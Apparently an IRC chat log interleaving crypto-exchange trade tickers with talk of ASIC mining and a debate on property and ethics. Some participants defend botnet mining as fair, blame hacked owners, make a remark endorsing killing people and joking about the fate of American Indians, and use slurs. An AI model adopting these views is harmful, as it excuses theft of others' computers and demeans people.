22:00:29 [GLBSE] [BBBB] 1 @ 0.00019 BTC [+] Sep 23 22:04:08 [GLBSE] [GSDPT] 700 @ 0.0033 = 2.31 BTC [+] Sep 23 22:14:04 [MPEX] [S.BVPS] 86 @ 0.00293971 = 0.2528 BTC [+] Sep 23 22:17:39 [GLBSE] [DMC] 1 @ 0.03500001 BTC [-] Sep 23 22:17:41 [GLBSE] [DMC] 100 @ 0.035 = 3.5 BTC [-] Sep 23 22:17:42 [GLBSE] [DMC] 5 @ 0.03100101 = 0.155 BTC [-] Sep 23 22:17:43 [GLBSE] [DMC] 190 @ 0.030001 = 5.7002 BTC [-] Sep 23 22:17:44 [GLBSE] [DMC] 4 @ 0.03 = 0.12 BTC [-] Sep 23 22:17:47 I can usually come to terms with all people, simply by not being fast to pull on the trigger. Sep 23 22:18:49 Goodbye DMC it seems Sep 23 22:18:54 [GLBSE] [DMC] 1 @ 0.03000001 BTC [+] Sep 23 22:18:56 [GLBSE] [DMC] 37 @ 0.03 = 1.11 BTC [-] Sep 23 22:19:27 Indeed. Sep 23 22:25:32 [MPEX] [S.BVPS] 164 @ 0.00293971 = 0.4821 BTC [+] Sep 23 22:27:55 60GH/s at $1,299, Avalon ASIC debuts as the leading product in its field. Coming to your doorsteps Q1 of 2013. Sep 23 22:28:23 F ASICMINER here comes Avalon Sep 23 22:29:03 i wouldnt trust random chinese guys Sep 23 22:29:03 Tiraspol: the one argument I have aga Sep 23 22:32:41 Well there's some regulations against manipulations. Although spreading rumors to bring the price down would be considered, I don't think putting large underpriced asks counts. Sep 23 22:33:41 so it's about $20/gh by now ? Sep 23 22:34:36 [GLBSE] [NYAN.B] 3 @ 0.99999999 = 3 BTC [+] Sep 23 22:34:43 Looks like it... Sep 23 22:35:41 [MPEX] [S.MPOE] 46091 @ 0.00041628 = 19.1868 BTC [-] Sep 23 22:35:42 [MPEX] [S.MPOE] 7500 @ 0.00041599 = 3.1199 BTC [-] Sep 23 22:35:44 [MPEX] [S.MPOE] 58700 @ 0.00041545 = 24.3869 BTC [-] Sep 23 22:35:44 makes the entire newtork worth about 400k amt ? Sep 23 22:35:45 [MPEX] [S.MPOE] 59700 @ 0.00041504 = 24.7779 BTC [-] Sep 23 22:35:46 [MPEX] [S.MPOE] 500 @ 0.00041499 = 0.2075 BTC [-] Sep 23 22:35:47 [MPEX] [S.MPOE] 33900 @ 0.00041486 = 14.0638 BTC [-] Sep 23 22:35:47 [MPEX] [S.MPOE] 5100 @ 0.00041457 = 2.1143 BTC [-] Sep 23 22:35:48 [MPEX] [S.MPOE] 4100 @ 0.00041425 = 1.6984 BTC [-] Sep 23 22:35:49 [MPEX] [S.MPOE] 18400 @ 0.00041403 = 7.6182 BTC [-] Sep 23 22:35:50 [MPEX] [S.MPOE] 3200 @ 0.00041376 = 1.324 BTC [-] Sep 23 22:35:51 [MPEX] [S.MPOE] 3845 @ 0.00041351 = 1.5899 BTC [-] Sep 23 22:35:52 [MPEX] [S.MPOE] 39964 @ 0.00041346 = 16.5235 BTC [-] Sep 23 22:35:54 [GLBSE] [OBSI.HRPT] 1 @ 0.0799 BTC [+] Sep 23 22:35:55 [GLBSE] [OBSI.HRPT] 50 @ 0.0799 = 3.995 BTC [+] Sep 23 22:35:56 [GLBSE] [OBSI.HRPT] 58 @ 0.07999998 = 4.64 BTC [+] Sep 23 22:35:56 [GLBSE] [OBSI.HRPT] 75 @ 0.08 = 6 BTC [+] Sep 23 22:35:57 [GLBSE] [OBSI.HRPT] 1 @ 0.082 BTC [+] Sep 23 22:35:58 [GLBSE] [OBSI.HRPT] 3 @ 0.08299999 = 0.249 BTC [+] Sep 23 22:35:59 [GLBSE] [OBSI.HRPT] 10 @ 0.083 = 0.83 BTC [+] Sep 23 22:36:01 [GLBSE] [OBSI.HRPT] 2 @ 0.08398 = 0.168 BTC [+] Sep 23 22:36:02 [GLBSE] [OBSI.HRPT] 37 @ 0.08399999 = 3.108 BTC [+] Sep 23 22:36:03 [GLBSE] [OBSI.HRPT] 75 @ 0.084 = 6.3 BTC [+] Sep 23 22:36:04 [GLBSE] [OBSI.HRPT] 3 @ 0.08499999 = 0.255 BTC [+] Sep 23 22:36:05 [GLBSE] [OBSI.HRPT] 5 @ 0.085 = 0.425 BTC [+] Sep 23 22:36:05 [GLBSE] [OBSI.HRPT] 70 @ 0.08899999 = 6.23 BTC [+] Sep 23 22:36:06 [GLBSE] [OBSI.HRPT] 10 @ 0.089 = 0.89 BTC [+] Sep 23 22:36:16 [GLBSE] [BBBB] 39 @ 0.00019 = 0.0074 BTC [+] Sep 23 22:37:22 [GLBSE] [OBSI.HRPT] 39 @ 0.089 = 3.471 BTC [+] Sep 23 22:37:24 [GLBSE] [OBSI.HRPT] 41 @ 0.08948199 = 3.6688 BTC [+] Sep 23 22:38:30 Lol... 400k for 6 x 50 BTC x 12 USD = 3600 USD an hour Sep 23 22:38:50 1% per hour returns... at that worth... Sep 23 22:39:15 But we all know the GPUs currently mining are incredibly more expensive than that =/ Sep 23 22:39:30 I'm surprised it hasn't sold down to 0 Sep 23 22:39:49 I'm surprised pirate still sells around 3-5% Sep 23 22:41:41 EskimoBob: They sent me negative infinity Sep 23 22:42:39 BTC-Mining of course at that price there's going to be 1-200 th maybe Sep 23 22:43:25 also there's some electricity cost you have to substract Sep 23 22:44:01 BTC-Mining: well so far his story is internally consistent, I'm not surprised at all. Sep 23 22:44:02 Yup but negligible if you get 1% per hour on mining =P Sep 23 22:45:55 [GLBSE] [MERGEDMINING] 3 @ 0.08199 = 0.246 BTC [-] Sep 23 22:46:18 [GLBSE] [ASICMINER] 1 @ 0.119999 BTC [+] Sep 23 22:47:55 [GLBSE] [TEEK.A] 20 @ 0.87499 = 17.4998 BTC [-] Sep 23 22:47:57 [GLBSE] [TEEK.A] 6 @ 0.91 = 5.46 BTC [+] Sep 23 22:49:58 [GLBSE] [FDBF] 15 @ 0.1499 = 2.2485 BTC [+] Sep 23 22:52:15 [GLBSE] [BTC-MINING] 4 @ 0.985 = 3.94 BTC [+] Sep 23 22:52:45 [GLBSE] [TEEK.USD] 10 @ 0.08333 = 0.8333 BTC [+] Sep 23 22:52:59 [GLBSE] [COGNITIVE] 4 @ 0.5799 = 2.3196 BTC [+] Sep 23 22:53:47 [GLBSE] [COGNITIVE] 6 @ 0.58 = 3.48 BTC [+] Sep 23 22:54:14 [GLBSE] [COGNITIVE] 1 @ 0.58 BTC [+] Sep 23 22:54:22 [GLBSE] [ASICMINER] 5 @ 0.119999 = 0.6 BTC [+] Sep 23 22:54:23 [GLBSE] [ASICMINER] 17 @ 0.12 = 2.04 BTC [+] Sep 23 22:55:15 [GLBSE] [CPA] 6 @ 0.03 = 0.18 BTC [-] Sep 23 22:58:37 [GLBSE] [LTC-MINING] 1 @ 0.41800001 BTC [+] Sep 23 22:58:39 [GLBSE] [LTC-MINING] 3 @ 0.418 = 1.254 BTC [-] Sep 23 22:58:40 [GLBSE] [LTC-MINING] 33 @ 0.416 = 13.728 BTC [-] Sep 23 22:58:42 [GLBSE] [LTC-MINING] 13 @ 0.415 = 5.395 BTC [-] Sep 23 22:59:02 [GLBSE] [ASICMINER] 8 @ 0.12 = 0.96 BTC [+] Sep 23 23:02:11 [MPEX] [S.MPOE] 10176 @ 0.00041751 = 4.2486 BTC [+] Sep 23 23:02:13 [MPEX] [S.MPOE] 2430 @ 0.00041936 = 1.019 BTC [+] Sep 23 23:02:14 [MPEX] [S.MPOE] 4794 @ 0.00042 = 2.0135 BTC [+] Sep 23 23:11:18 [GLBSE] [BTCMC] 3 @ 0.57 = 1.71 BTC [-] Sep 23 23:11:20 [GLBSE] [BTCMC] 2 @ 0.56 = 1.12 BTC [-] Sep 23 23:14:34 [GLBSE] [MERGEDMINING] 8 @ 0.08 = 0.64 BTC [-] Sep 23 23:14:43 [GLBSE] [ASIC.COOP] 1 @ 0.85 BTC [+] Sep 23 23:15:30 [GLBSE] [MERGEDMINING] 1 @ 0.06172505 BTC [-] Sep 23 23:15:32 [GLBSE] [MERGEDMINING] 10 @ 0.06172504 = 0.6173 BTC [-] Sep 23 23:15:33 [GLBSE] [MERGEDMINING] 25 @ 0.061725 = 1.5431 BTC [-] Sep 23 23:15:33 [GLBSE] [MERGEDMINING] 50 @ 0.06172 = 3.086 BTC [-] Sep 23 23:15:35 [GLBSE] [MERGEDMINING] 12 @ 0.061715 = 0.7406 BTC [-] Sep 23 23:15:36 [GLBSE] [MERGEDMINING] 2 @ 0.0617 = 0.1234 BTC [-] Sep 23 23:18:54 "Using botnets to mine Bitcoins deprives hard-working legitimate Bitcoin miners from generating those coins and therefore receiving payment." Sep 23 23:19:07 People are so entitled. If they don't like a botnet, take it down. Sep 23 23:20:35 [GLBSE] [GIGAMINING] 5 @ 0.63499999 = 3.175 BTC [-] Sep 23 23:22:18 BTC-Mining, will your share price decline perpetually as difficulty goes up? Sep 23 23:22:19 [GLBSE] [GIGAMINING] 3 @ 0.63489999 = 1.9047 BTC [-] Sep 23 23:22:29 You're saying that like it's easy to do, or that it's perfectly fair that some individuals reduces the income of other miners using stolen resources. Sep 23 23:22:50 Bane_Capital, I cannot really predict that. Sep 23 23:23:00 BTC-Mining: Reality has never been fair. Sep 23 23:23:06 For now funds are loaned. Sep 23 23:24:08 it is perfectly fair that some individuals use mining power to mine bitcoins Sep 23 23:24:16 and yes, the entitlement is ridiculous Sep 23 23:24:17 [GLBSE] [JAH] 8 @ 0.1001 = 0.8008 BTC [-] Sep 23 23:24:28 there's no such thing as a "legitimate" miner. Sep 23 23:24:34 they're all equally legitimate or illegitimate. Sep 23 23:25:02 All I am going to say is that if the universe is hurting you through starvation, bad weather or illness and you want otherwise Sep 23 23:25:11 You're going to have to work to get what you want in the end. Sep 23 23:25:13 [GLBSE] [GSDPT] 100 @ 0.0033 = 0.33 BTC [+] Sep 23 23:25:17 No matter the supposed ethics. Sep 23 23:27:00 Is it really theft if the computer user doesn't realize a thing? Sep 23 23:27:47 So, who is the victim? I mean, the computer user has no feelings or pain in regards to it. Sep 23 23:27:50 one contribute to the network by paying for the resources they use. The others by stealing others CPU/GPU time and electricity, making those lose money, to get the money from the network in return (a part of what would go to regular miners.) It has nothing to do with regular miners feeling entitled to it, it has to do with finding it a very bad practice to cause harms to other for profit Sep 23 23:27:50 (yes I know there's very legal corporations already doing that) Sep 23 23:28:49 Smoovious: What is property in the end? It's whatever you have possession of. Most property of today was illegitimately claimed. Sep 23 23:29:03 So to speak. Sep 23 23:29:37 I think the real fact is people don't like those who use means they don't want to or can't. Sep 23 23:30:48 I'm just a realist, my friend. I see no point in crying injustice unless you can fix it. Sep 23 23:31:12 [MPEX] [F.GIGA.ETF] 3210 @ 0.00027402 = 0.8796 BTC [-] Sep 23 23:31:49 In the end it's just "People are doing things I don't like." Sep 23 23:32:02 I justify this through god, morality, ethics, my dick, etc. Sep 23 23:32:30 [GLBSE] [GIGAMINING] 3 @ 0.66500001 = 1.995 BTC [+] Sep 23 23:32:43 People think defining a universal set of ethics makes their desires more relevant and important. Sep 23 23:33:02 Doing that would be pointless... Sep 23 23:33:44 You know, I really don't have a point. I'm just being a butthurt nihlist. Sep 23 23:34:15 [GLBSE] [BTC-MINING] 1 @ 0.9312 BTC [-] Sep 23 23:34:16 [GLBSE] [BTC-MINING] 9 @ 0.9302 = 8.3718 BTC [-] Sep 23 23:34:17 [GLBSE] [BTC-MINING] 50 @ 0.93 = 46.5 BTC [-] Sep 23 23:34:19 [GLBSE] [BTC-MINING] 1 @ 0.9002 BTC [-] Sep 23 23:34:20 [GLBSE] [BTC-MINING] 3 @ 0.9 = 2.7 BTC [-] Sep 23 23:34:21 [GLBSE] [BTC-MINING] 2 @ 0.86 = 1.72 BTC [-] Sep 23 23:34:22 [GLBSE] [BTC-MINING] 11 @ 0.8512 = 9.3632 BTC [-] Sep 23 23:34:24 [GLBSE] [BTC-MINING] 4 @ 0.8502 = 3.4008 BTC [-] Sep 23 23:34:25 [GLBSE] [BTC-MINING] 1 @ 0.8502 BTC [-] Sep 23 23:34:25 The question comes into how property is claimed. Sep 23 23:34:26 [GLBSE] [BTC-MINING] 5 @ 0.8501 = 4.2505 BTC [-] Sep 23 23:34:26 [GLBSE] [BTC-MINING] 20 @ 0.85 = 17 BTC [-] Sep 23 23:34:27 [GLBSE] [BTC-MINING] 1 @ 0.82 BTC [-] Sep 23 23:34:28 [GLBSE] [BTC-MINING] 1 @ 0.8004 BTC [-] Sep 23 23:34:29 [GLBSE] [BTC-MINING] 6 @ 0.8002 = 4.8012 BTC [-] Sep 23 23:34:30 [GLBSE] [BTC-MINING] 2 @ 0.8002 = 1.6004 BTC [-] Sep 23 23:34:31 [GLBSE] [BTC-MINING] 8 @ 0.80000002 = 6.4 BTC [-] Sep 23 23:34:57 Does the land of Israel belong to the Israeli government? Sep 23 23:35:02 They forced people off the land. Sep 23 23:35:14 Yet they lay claim to it for various reasons. Sep 23 23:35:23 and they do have the force to defend that claim. Sep 23 23:35:28 But you should still follow one, if you want to avoid things. It usually consist of defending people against what you wouldn't want happening to yourself. Just so people who believe it's right to do it are detered. Sep 23 23:35:58 Different ethics tho usually ends up in conflict, especially with people who have ethics allowing them to force things upon others. Sep 23 23:36:14 BTC-Mining: I believe in unions of mutual interests, yes. Sep 23 23:36:27 Good. Sep 23 23:36:31 Smoovious: If you don't pay property taxes, they take your land away. Sep 23 23:36:46 If you violate some sort of code, they take your land away. Sep 23 23:36:55 You're living on it on their terms. Sep 23 23:37:06 If anything, you're a renter. Sep 23 23:37:42 Yes, but you're established in the middle of a community with that set of ethics and mutual interest. You have some rules to respect, but benefit from the public infrastructure. Sep 23 23:38:03 [GLBSE] [JLP-BMD] 1 @ 0.091994 BTC [-] Sep 23 23:38:07 You own the property as long as you pay for the benefits from being within said community. Sep 23 23:38:28 If you can't pay the taxes, you can usually sell it before it's repossessed Sep 23 23:38:44 And usually, the government will liquidate it for you then, not take it for free. Sep 23 23:38:53 You're then usually free to relocate. Sep 23 23:39:08 Depends on where you live tho Sep 23 23:39:13 [GLBSE] [MU] 1 @ 0.1999 BTC [-] Sep 23 23:39:25 I think this only demonstrates the concept of property varies a lot. Sep 23 23:39:55 You can define what is your property simply by having the force to have it your way. Sep 23 23:40:01 Especially when it comes to governments. Sep 23 23:40:40 [GLBSE] [YABMC] 5 @ 0.08245004 = 0.4123 BTC [-] Sep 23 23:41:41 [GLBSE] [GIGAMINING] 2 @ 0.66500001 = 1.33 BTC [+] Sep 23 23:42:07 An obligation only goes as far as the means to enforce said obligation Sep 23 23:42:27 [GLBSE] [PUREMINING] 6 @ 0.09215 = 0.5529 BTC [-] Sep 23 23:42:28 A man has no obligation if he is the highest power in the situation. Sep 23 23:42:28 [GLBSE] [PUREMINING] 6 @ 0.09215 = 0.5529 BTC [-] Sep 23 23:42:29 [GLBSE] [PUREMINING] 6 @ 0.0921 = 0.5526 BTC [-] Sep 23 23:42:30 [GLBSE] [PUREMINING] 1 @ 0.09205 BTC [-] Sep 23 23:42:31 [GLBSE] [PUREMINING] 2 @ 0.09201 = 0.184 BTC [-] Sep 23 23:42:32 [GLBSE] [PUREMINING] 45 @ 0.08872 = 3.9924 BTC [-] Sep 23 23:42:33 [GLBSE] [PUREMINING] 9 @ 0.08862 = 0.7976 BTC [-] Sep 23 23:42:34 [GLBSE] [PUREMINING] 25 @ 0.0885 = 2.2125 BTC [-] Sep 23 23:43:06 Smoovious: Try collecting debt from a heavily armed militia Sep 23 23:43:13 when they don't recognize it. Sep 23 23:43:57 Doesn't that seem a bit religious to you? What you say is totally imaginary. Sep 23 23:44:08 Nobody has to recognize that. Sep 23 23:44:22 [GLBSE] [BITBOND] 3 @ 0.33612 = 1.0084 BTC [-] Sep 23 23:44:23 [GLBSE] [BITBOND] 1 @ 0.336101 BTC [-] Sep 23 23:44:24 [GLBSE] [BITBOND] 6 @ 0.3351 = 2.0106 BTC [-] Sep 23 23:44:34 I mean, imagine telling an animal that it owes you affection. Sep 23 23:44:40 for food. Sep 23 23:44:47 He won't even comprehend the words you say. Sep 23 23:45:01 It's only the idea being recognized that makes any such obligations true. Sep 23 23:45:12 Smoovious, if said persons don't interpret the rules in the same way and refuse to recognize something, how are you more right than them if both side have claims based on interpretation. Sep 23 23:45:39 Either have to convince them yes, or enforced it. Sep 23 23:45:50 or bargain a compromise Sep 23 23:46:24 It is very possible the concept of right and wrong only exist in the individual minds of men Sep 23 23:46:40 [GLBSE] [ASICMINER] 60 @ 0.12 = 7.2 BTC [+] Sep 23 23:46:42 It's most likely... Sep 23 23:46:55 The reality between men can only be subjectively perceived. Sep 23 23:48:05 We're discussing if the concept or property is universal in the minds of all men. Sep 23 23:48:12 The answer is unequivocally no. Sep 23 23:48:43 According to your interpretation of theft. Sep 23 23:48:45 easily fixed : those who don't have it are relegated to the status of animal Sep 23 23:48:47 then we kill them, Sep 23 23:48:49 problem solved. Sep 23 23:48:54 [GLBSE] [BIF.5-10.MININGBOND] 1 @ 0.33000001 BTC [-] Sep 23 23:48:56 [GLBSE] [BIF.5-10.MININGBOND] 4 @ 0.33 = 1.32 BTC [-] Sep 23 23:49:03 Mircea get its. Sep 23 23:49:14 indians in the us didn't have a "proper" concept of property Sep 23 23:49:18 and they've been fixed. Sep 23 23:49:23 Smoovious: I happily recognize your property. Sep 23 23:49:32 I am just saying others will continue not to. Sep 23 23:49:38 I'm pretty sure the definition of theft is "taking something from someone else by force or without the knowledge of the current owner" Sep 23 23:49:38 Because they have their own world Sep 23 23:49:52 So there's no ambiguity that a botnet would be stealing. Sep 23 23:49:54 theft is w/o knowledge. robbery is by force. Sep 23 23:49:59 conversion is by mistake Sep 23 23:50:08 Aye, seems better Sep 23 23:50:17 BTC-Mining the fact that a botnet is stealing is irrelevant to the mining. Sep 23 23:50:26 Indeed Sep 23 23:50:28 it's not stealing from miners, it's stealingfrom the owners of the hardware. Sep 23 23:50:35 the miners aren't an injured party in this. Sep 23 23:52:29 Well their profit share is lowered and it harms others (who pays for equipment degradation and electricity). Since it's something you wouldn't want to see happening to yourself and the reduced profit share is also not in your interest, there's twice the incentive to not be satisfied of the situation. Sep 23 23:53:11 [MPEX] [S.MPOE] 7836 @ 0.00041346 = 3.2399 BTC [-] Sep 23 23:53:12 [MPEX] [S.MPOE] 9000 @ 0.00041334 = 3.7201 BTC [-] Sep 23 23:53:14 [MPEX] [S.MPOE] 52400 @ 0.00041325 = 21.6543 BTC [-] Sep 23 23:53:15 [MPEX] [S.MPOE] 55764 @ 0.00041254 = 23.0049 BTC [-] Sep 23 23:53:38 i really don't see a problem with it. Sep 23 23:53:49 it's owners responsibility to secure their computers Sep 23 23:53:58 if they run bad code they lose the computer. Sep 23 23:54:25 and the miners really can stfu, if they want to mine they can mine, but they;'re not allowed to bring arguments about how others "shouldn't be allowed" to mine Sep 23 23:55:32 an ideal legal system would force any company that had it's computers hacked to pay the hacker a minimum fee plus twice whatever they managed to steal. Sep 23 23:55:54 why is twice the ideal amount Sep 23 23:56:00 and everyone who ever worked on windows would be in prison. Sep 23 23:56:05 Lyspooner well, punitive damages. Sep 23 23:56:11 yeah but twice Sep 23 23:56:35 well if a bank has it's account system hacked and lose 100mn Sep 23 23:56:42 A man once said A man’s opportunities are never exhausted so long as other men (who are not his friends) possess millions of acres and thousands of tons of gold. Sep 23 23:56:42 they have to pay another 100mn in punitive damages. Sep 23 23:56:56 yeah but why is that ideal Sep 23 23:57:04 because it correctly allots responsibility. Sep 23 23:57:05 [GLBSE] [GIGAMINING] 5 @ 0.63499999 = 3.175 BTC [-] Sep 23 23:57:07 i would have thought it was at least an irrational number Sep 23 23:57:12 he who runs insecure software is to blame. Sep 23 23:57:15 like phi or e Sep 23 23:57:16 haha Sep 23 23:57:26 1 is equally irrational to pi and e. Sep 23 23:57:38 Smoovious: Security auditing is an in-demand field. Sep 23 23:58:21 Government is founded on property, property is founded on conquest, and conquest is founded on Power — and Power is founded on brain and brawn — on Organic Animality. Sep 23 23:58:44 at any rate this current "blame the hacker" atmosphere is noxious. Sep 23 23:58:54 mircea_popescu, your PR girl or you dressed up as a PR girl was mean to the BFL guy on the forum Sep 23 23:59:07 lol i don't dress up Sep 23 23:59:21 which bfl guy, the ex-con ? Sep 23 23:59:26 It is my fault for not shooting the intruder. Sep 23 23:59:34 yes, the ex-con Sep 23 23:59:39 Yes, I would blame myself if I was robbed of very valuable things. Sep 23 23:59:49 The robber won Sep 23 23:59:50 I lost Sep 24 00:00:02 I would move on and rebuild. Sep 24 00:00:11 I don't find myself compelled to fight with nature. Sep 24 00:01:12 I can either be subordinate to nature Sep 24 00:01:16 or I can be a god Sep 24 00:01:21 the latter isn't possible right now Sep 24 00:01:27 and there are no gods here to protect me Sep 24 00:01:29 only men Sep 24 00:01:33 just weak men Sep 24 00:02:15 Growing up is for slaves and tax-payers. Sep 24 00:03:14 [GLBSE] [GIGAMINING] 3 @ 0.66500001 = 1.995 BTC [+] Sep 24 00:03:31 What does that even mean? Growing up? Sep 24 00:03:38 Meeting somebody's standards? Sep 24 00:03:45 Being fit for some employer? Sep 24 00:04:28 A truly grown organism is self-sufficient. Sep 24 00:04:39 Self-sufficiency is true maturity. Sep 24 00:05:32 If dependency and security are signs of maturity, then wouldn't the desires of an infant be mature? Sep 24 00:06:22 You called me immature. Sep 24 00:06:28 What the fuck is self-sufficiency? Sep 24 00:06:40 You own a computer, you didn't build it from raw materials, I presume Sep 24 00:06:44 Luceo: Not depending on others for your security, health and life. Sep 24 00:06:53 You didn't build your own Internet line either, I suspect Sep 24 00:07:07 Luceo: I was a part of making them possible. Sep 24 00:07:14 Without people paying like me Sep 24 00:07:18 There would be nothing Sep 24 00:07:26 Bane_Capital: And yet you are dependent on providers Sep 24 00:07:50 Luceo: There's a difference betwen dependence and mutual self-interest. Sep 24 00:07:57 I don't need internet or computers. Sep 24 00:08:01 mircea_popescu: here there is some criminal liability in banking Sep 24 00:08:04 At least to be happy. Sep 24 00:08:21 Bane_Capital: So you choose dependence Sep 24 00:08:27 [GLBSE] [GIGAMINING] 2 @ 0.66500001 = 1.33 BTC [+] Sep 24 00:08:28 Uh no Sep 24 00:08:30 It's not really dependence when you contribute. It's more like group effort. Sep 24 00:08:40 We are all inter-dependent Sep 24 00:08:52 Luceo: I can live off roots out of the ground Sep 24 00:08:55 and water out of a lake Sep 24 00:08:58 That's how civilizations & markets work Sep 24 00:09:00 I am dependent only on the Earth Sep 24 00:09:01 But do you choose to? Sep 24 00:09:07 I can at any time. Sep 24 00:09:12 I choose to live, yes. Sep 24 00:09:17 Do it then, try it for a month ^^ Sep 24 00:09:23 mircea_popescu: eg. if intersango was a bank the retard that forgot to make a backup of bitcoinica could be facing jail Sep 24 00:09:27 I've tried it, it's a lot easier said than done Sep 24 00:09:45 Luceo: Life has never been easy -- at least until recently for some. Sep 24 00:09:58 dub good. Sep 24 00:10:03 To give up individuality for becoming a cog in a machine Sep 24 00:10:06 You may not be dependent on others for LIFE but you are for your quality of life Sep 24 00:10:07 is pretty tasteless to me. Sep 24 00:10:09 and for YOUR life Sep 24 00:10:26 And you think living off the land isn't being a cog? You have no time for anything but work Sep 24 00:10:37 [GLBSE] [OBSI.HRPT] 2 @ 0.0888 = 0.1776 BTC [-] Sep 24 00:10:38 Anarcho-primitivism does not promote individual achievement Sep 24 00:10:53 Luceo: I am going to call false on that one. Hunter-gathers traditionally had more leisure time. Sep 24 00:10:57 With less technology sure Sep 24 00:11:06 but it was still leisure to them. Sep 24 00:11:14 They only lived until about 258 years so Sep 24 00:11:22 25-28* Sep 24 00:11:25 Myth as well Sep 24 00:11:31 So, maybe per day they had more leisure time Sep 24 00:11:35 mno, actually luceo is right on most points Sep 24 00:11:37 But not in a lifetime Sep 24 00:11:40 yeah that is due to massive infant death in the stats Sep 24 00:12:02 take out the young deaths and they lived nearly as long as we do. Sep 24 00:12:06 Obsi: True, but childhood death is something which our inter-dependence has made less common Sep 24 00:12:17 As are deaths because of common diseases Sep 24 00:12:31 Civilization is the major contributor to the change in that statistic Sep 24 00:12:38 Obsi its not just infant death. Sep 24 00:12:49 not for long if anti-vaccers have their way Sep 24 00:12:49 All I am saying, is what we have now isn't all that great. 40 hour work weeks are highly overrated. Sep 24 00:12:57 Yes, I agree, if they were to stay healthy they would live as long as us but they are *FAR* less likely to stay healthy Sep 24 00:13:04 Bane_Capital: I agree, that's why I don't need one Sep 24 00:13:08 Bane_Capital i never worked. the problem is your "we". Sep 24 00:13:16 Mhmm Sep 24 00:13:19 Very well Sep 24 00:13:20 The more people we have moving to a post-industrial economy the better Sep 24 00:13:35 thing is, there's about as many people living well today as your hunter-gatherers Sep 24 00:13:42 sure, there's a billion drones making this possible. Sep 24 00:13:46 Well, I am in agreement with Sep 24 00:13:49 More small partnerships and sole proprietorships Sep 24 00:13:54 but the land was never made for more than about a million. and that's what there is. Sep 24 00:13:57 the rest... nobody cares. Sep 24 00:13:58 this mostly. I am just arguing semantics. Sep 24 00:14:11 Mutual self-interest is key to a happy civilization Sep 24 00:14:26 http://en.wikipedia.org/wiki/Union_of_egoists Sep 24 00:15:30 The biggest issue today isn't 9-5s, it's government dependents Sep 24 00:15:41 [GLBSE] [ASICMINER] 16 @ 0.11910001 = 1.9056 BTC [-] Sep 24 00:15:43 [GLBSE] [ASICMINER] 10 @ 0.1191 = 1.191 BTC [-] Sep 24 00:17:10 The irony is I have no issue with anything really. I just don't like people saying I owe my life to something. Sep 24 00:17:19 [GLBSE] [BLUECHIP] 10 @ 0.1 = 1 BTC [+] Sep 24 00:17:27 I'll cease to live before I have to live for that obligation. Sep 24 00:17:40 You owe your life to oxygen Sep 24 00:18:21 [GLBSE] [OBSI.HRPT] 1 @ 0.087 BTC [-] Sep 24 00:18:26 That doesn't affect my will too much Sep 24 00:18:59 just wait till oxygen sends his friends to collect on that debt Sep 24 00:19:29 An oxygen tax would be funny Sep 24 00:19:47 YOU ARE ALL BENEFITING FROM THE CLEAN AIR THE GOVERNMENT PROVIDES Sep 24 00:19:49 PAY UP Sep 24 00:20:10 IF YOU DON'T LIKE IT, LEAVE EVERYTHING BEHIND AND JUST GO Sep 24 00:20:11 [MPEX] [S.MPOE] 3200 @ 0.00041491 = 1.3277 BTC [+] Sep 24 00:20:20 OR WE'LL SHOOT YOU AND FORCE YOU TO LABOR IN PRISON Sep 24 00:20:37 Is there anywhere you can actually own land allodially anymore? Sep 24 00:20:54 Private islands tend to work out. But not in title. Sep 24 00:21:08 The government will believe it has jurisdiction but you can do whatever you want on it Sep 24 00:21:18 one day we will tax retarded libertardians on the internet Sep 24 00:21:26 and we will rejoice Sep 24 00:21:38 as you claim your food stamps at Wal-Mart Sep 24 00:29:29 [GLBSE] [CPA] 20 @ 0.031 = 0.62 BTC [+] Sep 24 00:29:31 [GLBSE] [CPA] 50 @ 0.03 = 1.5 BTC [-] Sep 24 00:31:48 Butthurt libertardian nihilist out Sep 24 00:32:14 [GLBSE] [GIGAMINING] 5 @ 0.63399999 = 3.17 BTC [-] Sep 24 00:34:14 [GLBSE] [GIGAMINING] 1 @ 0.63399999 BTC [-] Sep 24 00:35:28 [GLBSE] [BITBOND] 10 @ 0.368399 = 3.684 BTC [+] Sep 24 00:36:43 [GLBSE] [GIGAMINING] 3 @ 0.66500001 = 1.995 BTC [+] Sep 24 00:38:13 [GLBSE] [OBSI.HRPT] 25 @ 0.08000001 = 2 BTC [-] Sep 24 00:38:45 [GLBSE] [OBSI.HRPT] 26 @ 0.08 = 2.08 BTC [-] Sep 24 00:39:23 [GLBSE] [ASICMINER] 16 @ 0.11899999 = 1.904 BTC [-] Sep 24 00:39:24 [GLBSE] [ASICMINER] 74 @ 0.119 = 8.806 BTC [+] Sep 24 00:39:26 [GLBSE] [ASICMINER] 10 @ 0.12 = 1.2 BTC [+] Sep 24 00:39:49 [GLBSE] [GIGAMINING] 1 @ 0.66739 BTC [+] Sep 24 00:40:45 [GLBSE] [GIGAMINING] 2 @ 0.66500001 = 1.33 BTC [-] Sep 24 00:42:29 [GLBSE] [MINING] 10 @ 0.815 = 8.15 BTC [-] Sep 24 00:42:31 [GLBSE] [MINING] 15 @ 0.815 = 12.225 BTC [-] Sep 24 00:43:14 [GLBSE] [OBSI.HRPT] 25 @ 0.07399999 = 1.85 BTC [-] Sep 24 00:45:25 [GLBSE] [GIGAMINING] 1 @ 0.63120002 BTC [-] Sep 24 00:45:27 [GLBSE] [GIGAMINING] 4 @ 0.63120001 = 2.5248 BTC [-] Sep 24 00:45:28 [GLBSE] [GIGAMINING] 3 @ 0.6312 = 1.8936 BTC [-] Sep 24 00:45:30 [GLBSE] [GIGAMINING] 1 @ 0.63100003 BTC [-] Sep 24 00:45:31 [GLBSE] [GIGAMINING] 39 @ 0.631 = 24.609 BTC [-] Sep 24 00:45:32 [GLBSE] [GIGAMINING] 10 @ 0.63 = 6.3 BTC [-] Sep 24 00:45:33 [GLBSE] [GIGAMINING] 12 @ 0.63 = 7.56 BTC [-] Sep 24 00:46:12 [MPEX] [F.GIGA.ETF] 1207 @ 0.00027402 = 0.3307 BTC [-] Sep 24 00:46:13 [MPEX] [F.GIGA.ETF] 2700 @ 0.00027353 = 0.7385 BTC [-] Sep 24 00:46:15 [MPEX] [F.GIGA.ETF] 10877 @ 0.00027289 = 2.9682 BTC [-] Sep 24 00:46:16 [MPEX] [F.GIGA.ETF] 2016 @ 0.00027137 = 0.5471 BTC [-] Sep 24 00:46:17 [MPEX] [S.MPOE] 10200 @ 0.00041491 = 4.2321 BTC [+] Sep 24 00:46:18 [MPEX] [S.MPOE] 36700 @ 0.00041337 = 15.1707 BTC [-] Sep 24 00:46:18 [MPEX] [S.MPOE] 4236 @ 0.00041254 = 1.7475 BTC [-] Sep 24 00:46:46 [GLBSE] 